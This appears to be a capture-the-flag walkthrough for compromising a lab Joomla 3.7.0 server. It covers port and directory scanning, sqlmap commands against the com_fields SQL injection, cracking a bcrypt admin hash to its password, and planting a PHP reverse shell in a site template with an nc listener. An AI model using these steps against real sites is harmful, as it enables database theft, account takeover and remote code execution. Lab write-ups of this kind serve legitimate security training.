.png)
6 months ago
34 BOOK THIS SPACE FOR AD
ARTICLE AD
It’s time to share the new scenario in which we will infiltrate the system by following the traces through Joomla CMS(Content Management System), which includes many methods, and the tool set we will use in this scenario.
Remember that Joomla is a free and open-source content management system (CMS) for publishing web content. Default settings and some updates can cause critical damage if not followed. In addition, we will also cover how to apply SQLi.
You will see what this means.
Let’s start!
Target IP: 10.10.188.217
Machine IP: 10.10.112.218
Never get bored, save all these constants in the shell.
Let’s scan the machine, discover any open doors (ports), and see what we see: nmap -sV -sC $target_ip -T4 -oN nmap_result.txt
-sV: Enables version detection of services.-sC: Runs default NSE scripts to gather additional information and perform various checks.$target_ip: The target IP address or hostname to be scanned.-T4: Sets the timing template to aggressive for faster scanning.-oN nmap_result.txt: Saves the scan results in a human-readable format to nmap_result.txt.We can travel to ports 22 (ssh), 80 (http), 3306 (mysql). We have also discovered that Joomla runs on port 80. Apache/2.4.6 was also included in our research. We have useful information.
We are one click away from HTTP. No need to wait, go here: http://10.10.188.217:80
Check out the details on the website, it will give you clues about approaches you can try in most scenarios.
Let’s see what will come out of the directory discovery. You can use tools like dirb, gobuster.
Since we discovered Apache you can use this wordlist /usr/share/dirb/wordlists/vulns/apache.txt
Dirbuster contains a wordlist within itself. You can also use one of these.
I think you should save this as fixed too.
When you start it, a screen like this greets you. Let’s continue with gobuster.
gobuster dir -w $common_web_dir -u $target_ipA paradise full of 301 (Moved Permanently) HTTP codes…
Jump to the /administrator page: http://10.10.188.217/administrator
Joomla is exactly before us. So which version? I think we need to examine the content source. The /language page also gave 301. Go there.
Empty? Really? I can’t be. It would be useful to explore a directory through this. But we need to create a wordlist of ISO codes for the languages.
Create a empty .txt file.
Write the most used ISO codes into it. Case matching is important.
Activate the gobuster tool again and provide the url.
Bingo! en-GB is available to us. Go.
Find en-GB.xml and review it.
We have the version. We managed to mark it as Joomla 3.7.0.
What can we discover as an exploit? Let’s see.
We have a vulnerability that allows SQL injection! Download and review this: searchsploit -m php/webapps/42033.txt
You’ve seen the method. We can try. Commands added after /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]= can be run.,
We need to do a general scan on sqlmap and see what more we can get: sqlmap -u “http://10.10.188.217/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent — dbs -p list[fullordering]
Be sure to check the output. It may contain valuable details.
Wow! It worked and now our attack surface is very wide.
You can also use this to get it all in one pen. You should follow the process interactively: sqlmap -u “http://10.10.188.217/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent — dbs -p list[fullorordering] — dump-all -D joomlaDataSql
You can perform exploration on the database by following the steps here. On the other hand, you can speed up the process by downloading a ready-made script: https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
Let’s continue with this script.
We now have a username, an email and a hash! So what hash type is this? Check it: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
A bcrypt type hash…
Let’s save this in a file with .hash extension.
Run John the Ripper to crack the password hash: john --wordlist=/usr/share/wordlists/rockyou.txt jonah_user.hash --format=bcrypt
This tool works depending on your machine power. After a while, we will receive the password: spiderman123
Full account is jonah:spiderman123
Let’s log in.
So what more can we do? Reverse shell? Try.
Go Templates.
Again, view Templates in the left panel and access admin files.
Did you see the index.php file in the left panel? Enter inside.
We will make big changes to this. First, copy this content: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Then delete content and paste this reverse shell into this index.php.
We need to determine the IP and port we will listen on. Let’s put the machine in listening mode: nc -nlvp 5110
Change the IP and port values according to the machine and port we are listening to.
Click the Save & Close button in the top left tab.
Refresh the website index.php, then let the magic begin.
Game over.
Now surf as you wish.
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·